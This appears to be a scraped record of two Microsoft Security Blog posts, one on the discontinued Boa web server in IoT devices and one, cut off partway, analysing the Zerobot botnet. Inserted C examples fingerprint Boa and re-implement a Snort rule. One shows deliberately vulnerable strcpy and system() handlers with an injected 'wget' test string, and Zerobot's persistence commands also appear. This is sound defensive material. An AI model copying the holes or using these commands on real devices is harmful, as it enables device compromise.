[Log4J](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) and [SolarWinds](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>), have highlighted the importance of visibility across device components and proactively securing networks. 
A [report](<https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets?__hstc=156209188.65c2d309abc7befc704e210a65154bf8.1666196607997.1666196607997.1666196607997.1&__hssc=156209188.1.1666196607998&__hsfp=2445685111>) published by Recorded Future in April 2022 detailed suspected electrical grid intrusion activity and implicated common IoT devices as the vector used to gain a foothold into operational technology (OT) networks and deploy malicious payloads. While investigating the attack activity, Microsoft researchers identified a vulnerable component on all the IP addresses published as IOCs and found evidence of a supply chain risk that may affect millions of organizations and devices.\n\nWe assessed the vulnerable component to be the Boa web server, which is often used to access settings and management consoles and sign-in screens in devices. Despite being discontinued in 2005, the Boa web server continues to be implemented by different vendors across a variety of IoT devices and popular software development kits (SDKs). Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files. Moreover, those affected may be unaware that their devices run services using the discontinued Boa web server, and that firmware updates and downstream patches do not address its known vulnerabilities.\n\nIn this blog, we detail the risks affiliated with vulnerable components, highlighting the Boa web server, and how we suspect these components could be exploited to target critical industries. We also discuss the difficulties with identifying these components in device supply chains. 
To provide comprehensive protection against such attacks, we offer detection information to identify vulnerable components and guidance for organizations and network operators to improve their security posture.\n\n## Investigating the attack activity\n\nThe attack detailed in the Recorded Future report was one of several intrusion attempts on Indian critical infrastructure since 2020, with the [most recent attack](<https://www.bleepingcomputer.com/news/security/hive-claims-ransomware-attack-on-tata-power-begins-leaking-data/>) on IT assets confirmed in October 2022. Microsoft assesses that Boa servers were running on the IP addresses on the list of IOCs published by Recorded Future at the time of the report\u2019s release and that the electrical grid attack targeted exposed IoT devices running Boa.\n\nMicrosoft further identified that half of the IP addresses published by Recorded Future returned suspicious HTTP response headers, which might be associated with the active deployment of the malicious tool identified by Recorded Future. The combination of Boa and suspicious response headers was identified on another set of IP addresses, displaying similar behavior to those found by Recorded Future. While these IP addresses are not confirmed as malicious, we recommend they be monitored to ensure no additional suspicious activity. 
Users of Microsoft Defender Threat Intelligence will find these IP addresses in the portal labeled as block-listed or suspicious:\n\n * 122[.]117[.]212[.]65\n * 103[.]58[.]93[.]133\n * 125[.]141[.]38[.]53\n * 14[.]45[.]33[.]239\n * 14[.]55[.]86[.]138\n * 183[.]108[.]133[.]29\n * 183[.]99[.]53[.]180\n * 220[.]94[.]133[.]121\n * 58[.]76[.]177[.]166\n\nInvestigating the headers further indicated that over 10% of all active IP addresses returning the headers were related to critical industries, such as the petroleum industry and associated fleet services, with many of the IP addresses associated to IoT devices, such as routers, with unpatched critical vulnerabilities, highlighting an accessible attack vector for malware operators. Most of the suspicious HTTP response headers were returned over a short timeframe of several days, leading researchers to believe they may be associated with intrusion and malicious activity on networks.\n\nSince the report\u2019s publication, Microsoft researchers tracking the published IPs hosts have observed that all IP addresses have been compromised by a variety of attackers employing different malicious methods. For example, some of the IP addresses were further leveraged to download a variant of the Mirai malware family shortly following the report's release. Microsoft also found evidence that across different devices on the IP addresses, there were attempts to connect with default credentials through brute force methods and attempts to run shell commands. Microsoft continues to see attackers attempting to exploit Boa vulnerabilities beyond the timeframe of the released report, indicating that it is still targeted as an attack vector.\n\n## Boa widespread through SDKs\n\nThe Boa web server is widely implemented across a variety of devices, including IoT devices ranging from routers to cameras, and is often used to access settings and management consoles as well as sign-in screens. 
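Identifying the component described above from the outside is mostly a matter of reading the HTTP Server header of the management interface. The C program below is an added example written for this page, not Microsoft's tooling: it parses a constructed HTTP response, pulls out the Server header (case-insensitively, and only from the header block, not the body) and reports whether the server is Boa and which version it announces. This is the check an exposure scan or an asset inventory would run against every management interface it can reach. The sample response and the version string in it are constructed for illustration.

```c
/*
 * Added example (editor's code, not Microsoft's): fingerprint a Boa web server
 * from a raw HTTP response, the way an exposure scan would. The only signal
 * used is the Server header; the sample response in main() is constructed.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Case-insensitive prefix compare; header names are case-insensitive. */
static int prefix_icase(const char *s, const char *prefix) {
    while (*prefix) {
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
        s++; prefix++;
    }
    return 1;
}

/* Copy the value of the Server header out of a raw HTTP response into out.
 * Returns 1 if found, 0 otherwise. Only the header block (before the blank
 * line) is examined, so a body that merely mentions "Server:" cannot match. */
int http_server_header(const char *resp, char *out, size_t outlen) {
    const char *p = strstr(resp, "\r\n");          /* skip the status line */
    const char *end = strstr(resp, "\r\n\r\n");     /* end of header block */
    if (!p) return 0;
    if (!end) end = resp + strlen(resp);
    p += 2;
    while (p < end) {
        const char *eol = strstr(p, "\r\n");
        if (!eol) eol = end;
        if (prefix_icase(p, "server:")) {
            const char *v = p + 7;
            while (v < eol && (*v == ' ' || *v == '\t')) v++;   /* skip OWS */
            size_t n = (size_t)(eol - v);
            if (n >= outlen) n = outlen - 1;
            memcpy(out, v, n);
            out[n] = '\0';
            return 1;
        }
        p = eol + 2;
    }
    return 0;
}

/* Returns 1 and writes the announced version (text after "Boa/") into ver if
 * the response comes from Boa, else 0. Boa was discontinued in 2005, so any
 * hit is an unmaintained component worth a ticket regardless of version. */
int is_boa_server(const char *resp, char *ver, size_t verlen) {
    char server[128];
    if (!http_server_header(resp, server, sizeof server)) return 0;
    if (!prefix_icase(server, "boa")) return 0;
    if (server[3] != '/' && server[3] != '\0' && server[3] != ' ') return 0; /* not "Boa..." */
    const char *v = server + 3;
    if (*v == '/') v++;
    size_t n = strcspn(v, " \t");                  /* version token ends at whitespace */
    if (n >= verlen) n = verlen - 1;
    memcpy(ver, v, n);
    ver[n] = '\0';
    return 1;
}

/* Convenience for scripts and tests: 1 if resp is Boa with exactly this version. */
int boa_version_is(const char *resp, const char *expected) {
    char ver[32];
    return is_boa_server(resp, ver, sizeof ver) && strcmp(ver, expected) == 0;
}

int main(void) {
    /* Constructed sample; the version string is an assumption for illustration. */
    const char *resp =
        "HTTP/1.1 200 OK\r\n"
        "Date: Mon, 21 Nov 2022 10:00:00 GMT\r\n"
        "Server: Boa/0.94.14rc21\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html>login</html>";
    char ver[32];
    if (is_boa_server(resp, ver, sizeof ver))
        printf("Boa detected, version %s: discontinued web server, treat as a vulnerable component\n", ver);
    else
        printf("not Boa\n");
    return 0;
}
```

A header that is missing or spoofed does not prove absence, so treat this as a first-pass filter: a negative result still leaves firmware inspection or a Boa-specific behavioural probe as the way to confirm.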
The popularity of Boa web servers is especially concerning as Boa has been formally discontinued since 2005. Data from the Microsoft Defender Threat Intelligence platform identified over 1 million internet-exposed Boa server components around the world over the span of a week, as depicted in the below figure:\n\nFigure 1. Global mapping of internet-exposed Boa web servers on devices\n\nBoa web servers remain pervasive in the development of IoT devices; one reason for this could be its inclusion in popular SDKs, which contain the essential functions that drive the system on chip (SoC) in these devices. Vulnerable components like Boa and SDKs are often distributed to customers within devices, contributing to [supply chain vulnerabilities](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>). Popular SDKs, like those released by RealTek, are used in SoCs provided to companies that manufacture gateway devices like routers, access points, and repeaters. Critical vulnerabilities such as [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>), which affected the web-based administration of devices using RealTek\u2019s SDK, and [CVE-2022-27255](<https://nvd.nist.gov/vuln/detail/CVE-2022-27255>), a zero-click overflow vulnerability, [reportedly affect millions of devices](<https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/>) globally and allow attackers to launch code, compromise devices, [deploy botnets](<https://www.bleepingcomputer.com/news/security/botnet-targets-hundreds-of-thousands-of-devices-using-realtek-sdk/?fbclid=IwAR1Bp2n0EXpD01pNGfs7T24Rdc2HeCPrN4za5Pj21CXFNPgOFFG-I_ZMXtg>), and move laterally on networks.\n\nWhile patches for the RealTek SDK vulnerabilities are available, some vendors may not have included them in their device firmware updates, and the updates do not include patches for Boa vulnerabilities. 
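The CVE-2021-35395 handler bugs referenced above are a textbook pair: a request parameter copied into a fixed-size stack buffer with no length check, and a request parameter handed to system(). The C below is an added schematic written for this page, not Realtek's or any vendor's source. It puts the vulnerable shape of each handler next to a hardened one: a bounded copy that rejects oversize input rather than truncating it, and an allowlist that maps the form value to a fixed command path instead of building a shell string. The parameter names follow the CVE-2021-35395 description (the submit-url parameter of the form handlers and formSysCmd's sysCmd parameter); the buffer size, page name and allowlist entries are assumptions for illustration.

```c
/*
 * Added example (editor's schematic, not Realtek's or any vendor's source):
 * the two bug classes behind CVE-2021-35395, each beside a hardened handler.
 * URL_BUF, the allowlist entries and the sample page name are assumptions.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define URL_BUF 64   /* fixed-size stack buffer, as in the vulnerable handlers */

/* ---- Vulnerable pattern ----
 * The form handler copies a request parameter into a stack buffer with an
 * unbounded strcpy. A submit-url of URL_BUF bytes or more writes past the
 * buffer and, on a typical stack layout, over the saved return address: a
 * stack buffer overflow. Shown for contrast only; main() never feeds it
 * untrusted input. */
void vuln_form_handler(const char *submit_url) {
    char url[URL_BUF];
    strcpy(url, submit_url);                 /* no length check */
    printf("redirect: %s\n", url);
}

/* The sysCmd parameter goes straight to a shell: command execution by design.
 * Never called here; it exists to show the shape of the bug. */
void vuln_form_sys_cmd(const char *syscmd) {
    system(syscmd);                          /* attacker-controlled command line */
}

/* ---- Hardened pattern ---- */

/* Bounded copy that rejects over-long input instead of silently truncating,
 * so an oversize value can never reach the stack. Returns 0 = ok, -1 = rejected. */
int safe_copy_param(char *dst, size_t dstlen, const char *src) {
    size_t n = strlen(src);
    if (n >= dstlen) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened replacement for the submit-url handler: 0 = accepted, -1 = rejected. */
int submit_url_accepted(const char *submit_url) {
    char url[URL_BUF];
    if (safe_copy_param(url, sizeof url, submit_url) != 0)
        return -1;                           /* a real server answers 400 here */
    /* url is now safe to use; a real handler would also restrict it to a local page */
    return 0;
}

/* User input only selects an entry in a fixed table; the selected binary is
 * run by path with no shell, so metacharacters in sysCmd are irrelevant. */
static const struct { const char *name; const char *path; } allowed_cmds[] = {
    { "reboot",   "/sbin/reboot"   },       /* assumed entries */
    { "ifconfig", "/sbin/ifconfig" },
};

const char *resolve_sys_cmd(const char *syscmd) {
    size_t i;
    for (i = 0; i < sizeof allowed_cmds / sizeof allowed_cmds[0]; i++)
        if (strcmp(syscmd, allowed_cmds[i].name) == 0)
            return allowed_cmds[i].path;
    return NULL;                             /* anything else, including "reboot;wget ..." */
}

int main(void) {
    char big[200];                           /* constructed oversize submit-url */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    vuln_form_handler("wireless.htm");       /* benign input only */
    printf("short submit-url accepted: %d\n", submit_url_accepted("wireless.htm"));
    printf("199-byte submit-url accepted: %d\n", submit_url_accepted(big));
    printf("sysCmd=reboot -> %s\n", resolve_sys_cmd("reboot"));
    printf("sysCmd=\"reboot;wget http://x/a.sh\" -> %s\n",
           resolve_sys_cmd("reboot;wget http://x/a.sh") ? "allowed" : "rejected");
    return 0;
}
```

The point of the allowlist is that rejecting metacharacters is not the fix; the fix is that no byte of the request ever becomes part of a command line. Run the selected path with execv() or posix_spawn() in a real handler, not system().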
Boa servers are affected by several known vulnerabilities, including CVE-2009-4496, which could allow attackers to execute code remotely. Additional vendor and device specific vulnerabilities exist across a range of devices including routers.\n\nFigure 2. The IoT device supply chain demonstrates how vulnerabilities are distributed downstream to organizations and their assets\n\nThe popularity of the Boa web server displays the potential exposure risk of an insecure supply chain, even when security best practices are applied to devices in the network. Updating the firmware of IoT devices does not always patch SDKs or specific SOC components and there is limited visibility into components and whether they can be updated. The known CVEs impacting such components can allow an attacker to collect information about network assets before initiating attacks, and to gain access to a network undetected by obtaining valid credentials. In critical infrastructure networks, being able to collect information undetected prior to the attack allows the attackers to have much greater impact once the attack is initiated, potentially disrupting operations that can cost millions of dollars and affect millions of people.\n\n## Recommendations\n\nAs attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations. 
This case displays the importance of proactive cyber security practices and the need to identify vulnerable components that may be leveraged by attackers.\n\nMicrosoft recommends that organizations and network operators follow best practice guidelines for their networks:\n\n * **Patch vulnerable devices whenever possible** to reduce exposure risks across your organization.\n * **Utilize device discovery and classification** to identify devices with vulnerable components by enabling vulnerability assessments, which identifies unpatched devices in the organizational network and set workflows for initiating appropriate patch processes with solutions like [Microsoft Defender Vulnerability Management](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management>) and [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) with [Microsoft Defender for IoT ](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-microsoft-defender-for-iot-integration>).\n * **Extend vulnerability and risk detection beyond the firewall** with platforms like [Microsoft Defender External Attack Surface Management](<https://learn.microsoft.com/azure/external-attack-surface-management/>). Customers can identify internet-exposed infrastructure running Boa web server components in their inventory and use the insights tile under the Attack Surface Summary dashboard to surface assets vulnerable to CVE-2009-4496. The insight can be found under High Severity Observations.\n * **Reduce the attack surface** by eliminating unnecessary internet connections to IoT devices in the network. Apply network segmentation to prevent an attacker from moving laterally and compromising assets after intrusion. 
IoT and critical device networks should be isolated with firewalls.\n * **Use proactive antivirus scanning** to identify malicious payloads on devices.\n * **Configure detection rules to identify malicious activity** whenever possible. Security personnel can use our snort rule below to configure security solutions to detect CVE-2022-27255 on assets using the RealTek SDK.\n \n \n alert udp any any -> any any (msg:\"Realtek eCOS SDK SIP Traffic Exploit CVE-2022-27255\"; content: \"invite\"; depth: 6; nocase; content: \"sip:\"; content: \"m=audio \"; isdataat: 128,relative; content:!\"|0d|\"; within: 128;sid:20221031;)\n\n * **Adopt a comprehensive IoT and OT solution** like [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to monitor devices, respond to threats, and increase visibility in order to detect and alert when IoT devices with Boa are used as an entry point to a network and protect critical infrastructure. \n\n_**Adam Castleman, Jordan Herman**, Microsoft Defender Threat Intelligence_ \n_**Rotem Sde Or, Ilana Sivan, Gil Regev**, Microsoft Defender for IoT Research Team_ \n_**Ross Bevington**, Microsoft Threat Intelligence Center_\n\nThe post [Vulnerable SDK components lead to supply chain risks in IoT and OT environments](<https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, 
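The Snort rule above is compact enough to re-implement by hand, which is useful when the traffic is already in a pcap or a SIP proxy log rather than on the wire. The C below is an added example written for this page, not Microsoft's code. It applies the rule's conditions in order to a UDP payload: "invite" within the first 6 bytes (case-insensitive), "sip:" and "m=audio " anywhere, and after an "m=audio " match at least 128 bytes none of which is a carriage return, i.e. an SDP media line far longer than any legitimate one. The two sample INVITE messages are constructed; one reading choice is stated in the comments (isdataat:128,relative is taken as "at least 128 bytes remain after the match").

```c
/*
 * Added example (editor's code, not Microsoft's): the matching logic of the
 * Snort rule for CVE-2022-27255, implemented directly so it can be run over
 * captured UDP/5060 payloads offline. Sample payloads are constructed.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* memmem() is not ISO C; small portable substitute. */
static const unsigned char *find_bytes(const unsigned char *hay, size_t haylen,
                                       const char *needle) {
    size_t n = strlen(needle);
    if (n == 0 || haylen < n) return NULL;
    for (size_t i = 0; i + n <= haylen; i++)
        if (memcmp(hay + i, needle, n) == 0) return hay + i;
    return NULL;
}

/* content:"invite"; depth:6; nocase; */
static int starts_with_invite(const unsigned char *p, size_t len) {
    static const char kw[] = "invite";
    if (len < 6) return 0;
    for (size_t i = 0; i < 6; i++)
        if (tolower(p[i]) != kw[i]) return 0;
    return 1;
}

/* Returns 1 if the payload matches the CVE-2022-27255 signature, else 0. */
int matches_cve_2022_27255(const unsigned char *buf, size_t len) {
    if (!starts_with_invite(buf, len)) return 0;
    if (!find_bytes(buf, len, "sip:")) return 0;          /* content:"sip:" (absolute) */

    /* Try every "m=audio " occurrence, as Snort does when within/isdataat fail. */
    size_t off = 0;
    for (;;) {
        const unsigned char *m = find_bytes(buf + off, len - off, "m=audio ");
        if (!m) return 0;
        size_t after = (size_t)(m - buf) + 8;                /* cursor after "m=audio " */
        if (len - after >= 128 &&                            /* isdataat:128,relative (reading: >=128 bytes remain) */
            memchr(buf + after, '\r', 128) == NULL)          /* content:!"|0d|"; within:128 */
            return 1;
        off = after;
    }
}

/* Wrapper for NUL-terminated text payloads. */
int matches_str(const char *s) {
    return matches_cve_2022_27255((const unsigned char *)s, strlen(s));
}

/* Build a constructed INVITE whose m=audio line is n filler bytes followed by
 * CRLF, and run the signature over it. Returns -1 if n does not fit. */
int long_media_line_matches(size_t n) {
    static const char head[] =
        "INVITE sip:100@192.0.2.10 SIP/2.0\r\n\r\nv=0\r\nm=audio ";
    unsigned char buf[1024];
    size_t hl = sizeof head - 1;
    if (n > sizeof buf - hl - 2) return -1;
    memcpy(buf, head, hl);
    memset(buf + hl, '0', n);
    memcpy(buf + hl + n, "\r\n", 2);
    return matches_cve_2022_27255(buf, hl + n + 2);
}

int main(void) {
    /* Constructed, well-formed INVITE with a normal media line. */
    const char *benign =
        "INVITE sip:100@192.0.2.10 SIP/2.0\r\n"
        "Content-Type: application/sdp\r\n\r\n"
        "v=0\r\nm=audio 49170 RTP/AVP 0\r\n";
    printf("benign INVITE:              %d\n", matches_str(benign));
    printf("m=audio + 127 bytes + CRLF: %d\n", long_media_line_matches(127));
    printf("m=audio + 128 bytes + CRLF: %d\n", long_media_line_matches(128));
    printf("m=audio + 600 bytes + CRLF: %d\n", long_media_line_matches(600));
    return 0;
}
```

The boundary case is worth keeping in a regression test: 127 filler bytes puts the CR inside the 128-byte window and the rule stays quiet, 128 does not and it fires. A legitimate m=audio line is a few dozen bytes, so the threshold leaves plenty of margin, but a tuned rule for a specific vendor build should be checked against that build's real buffer size.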
"published": "2022-11-22T17:00:00", "type": "mmpc", "title": "Vulnerable SDK components lead to supply chain risks in IoT and OT environments", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4496", "CVE-2021-35395", "CVE-2021-44228", "CVE-2022-27255"], "modified": "2022-11-22T17:00:00", "id": "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "href": "https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T20:35:18", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. 
Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. 
Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. 
Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh_ that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. 
While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe_). Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop_.\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. 
\nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using the Go standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ASCII). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. 
This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely 
